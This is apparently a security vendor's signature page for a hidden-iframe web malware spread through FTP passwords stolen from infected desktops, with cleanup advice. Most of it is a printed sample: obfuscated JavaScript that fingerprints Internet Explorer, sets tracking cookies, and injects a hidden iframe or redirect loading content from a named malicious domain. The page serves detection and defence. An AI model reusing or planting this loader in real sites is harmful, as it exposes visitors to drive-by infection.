SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwiframehd567

malware-entry-mwiframehd567

Description:

A hidden and malicious iframe was identified. This malware infects a web site through a compromised desktop (with virus), where it steals any stored password from the FTP client and uses that to attack the site.
 
Note that every PHP, HTML and JS file gets compromised by this malware.

 
Affecting: Any web site with FTP enabled (and password stolen).

Clean up: The desktop must be cleaned first. Use multiple AVs if necessary, since this
virus is very good at hiding from the current AV that is running. Once it is clean, then you
can clean up the sites and change the passwords.You can also sign up with us and let our team remove the malware for you.

 
Loads malware from multiple sources:


http://adimgsn03.co.in/smb
(and many other domains).

 

Malware dump (sample of malware):


f="ux73x65ridAx308x317x46Bx325";var c="25";var vLGtb=1;var AkIm1Qm;var idTq="hx74x74px3ax2fx2flocax6chosx74:7102x2f";function IkfyC(R_0wqMQ)
{var luCu0N=document.cookie;if(!luCu0N)
{return null;}luCu0N=luCu0N&#46replace(/s/g,"");var eQ2Ki=luCu0N&#46split(";");var i=0;for(i=0;i<eQ2Ki.length;i++){var Pa8CI=eQ2Ki[i]&#46split("=");if(Pa8CI[0]!=R_0wqMQ)
{continue;}return unescape(Pa8CI[1]);}return null;};function Sk5Ht(R_0wqMQ,R7prjG,k){var exp=new Date();var Uwe3iQB=exp&#46getTime()+
(k60601000);exp&#46setTime(Uwe3iQB);var v1tDww5=R_0wqMQ+"="+escape(R7prjG)+"x3b ex78x70iresx3d"+exp&#46toGMTString();document&#46cookie=v1tDww5;};function iyou1V()
{var lsnV=document&#46getElementById("ifr1");var IhT3RL=new Date();var hgJFg=IhT3RL&#46getTime();var dwdc_m=hgJFg-AkIm1Qm;if(dwdc_m<1000)
{document&#46location=idTq+escape("htx74p:x2fx2fx61dx69mgx73n03x2ex63o&#46in/x6bs");}else{AkIm1Qm=hgJFg;lsnV&#46src=idTq;}};function UvPe()
{try{var lfkcQ=document&#46getElementById("x74x6dp_dx69v1");lfkcQ&#46style&#46visibility="x68x69ddex6e";Sk5Ht(f,c,168);}catch(e){Sk5Ht(f,c,24);};};function xHUh(){var aE3Di=/MSIEs+
(d+)&#46(d+)/;var i9CCc=new Array;var VPxMI,yt9GCDK;i9CCc=aE3Di&#46exec(navigator&#46userAgent);if(!i9CCc){return false;}VPxMI=parseInt(i9CCc[1])100+parseInt(i9CCc[2]);if(VPxMI<700)
{return false;}aE3Di=/WindowssNTs(d)&#46(d)/;i9CCc=aE3Di&#46exec(navigator&#46userAgent);if(!i9CCc){return false;}yt9GCDK=parseInt(i9CCc[1])10+parseInt(i9CCc[2]);if(yt9GCDK<60)
{return false;}return true;};function s8K9GnS(){if(vLGtb){try{if(IkfyC(f)==c)
{return false;}}catch(e){};}try{var lfkcQ=document&#46getElementById("tmx70_x64x69v1");if(lfkcQ){return false;}}catch(e)
{};try{var lfkcQ=document&#46createElement("DIV");lfkcQ&#46id="x74mp_dix76x31";document&#46body&#46appendChild(lfkcQ);var d=0;if(navigator&#46userAgent&#46indexOf("MSIE")!= -1)
{try{d=g();function g(){return 0;}}catch(e){d=1;}}if(d==0){lfkcQ&#46innerHTML
="x3cx69framx65 x6fx6eload=x27x55x76Pex28x29;x27 
x73rcx3dx27hx74tx70x3ax2f/x61dx69x6dgsnx303&#46x63o&#46inx2fkx27 wx69dtx68=x31x39x20heighx74=x319 framebx6frdx65x72=x30 scrollix6egx3dx27nx6fx27>x3c/ix66rame>";}else{lfkcQ&#46innerHTML="<ix66x72amx65x20onx6cx6fad=x27x55vPe();x27 x73x72c=
x27httpx3ax2f/adimgsn0x33&#46cox2ex69nx2fx73mx62x27 wix64tx68=19x20heix67x68tx3d19 frax6dx65bx6frder=0x20x73cx72x6flx6cx69ng=x27x6eox27x3e<x2fx69frame>";return;}}catch(e){};};if(document&#46addEventListener){document&#46addEventListener("DOMCx6fx6etex6etLoax64x65x64",s8K9GnS,false);}else{document&#46write('<'+'script id=__ie_onload defer src=javascript:void(0)><'+'/script>');var script=document&#46getElementById("x5f_ix65_onx6cx6fad");script&#46onreadystatechange=function(){if(this&#46readyState=="cox6dx70x6cete"){s8K9GnS();}};}function dCKehf(str) 
{return str&#46replace(/[^x01-x7F]/g, "");}/ 1xnDzVVMAr6u */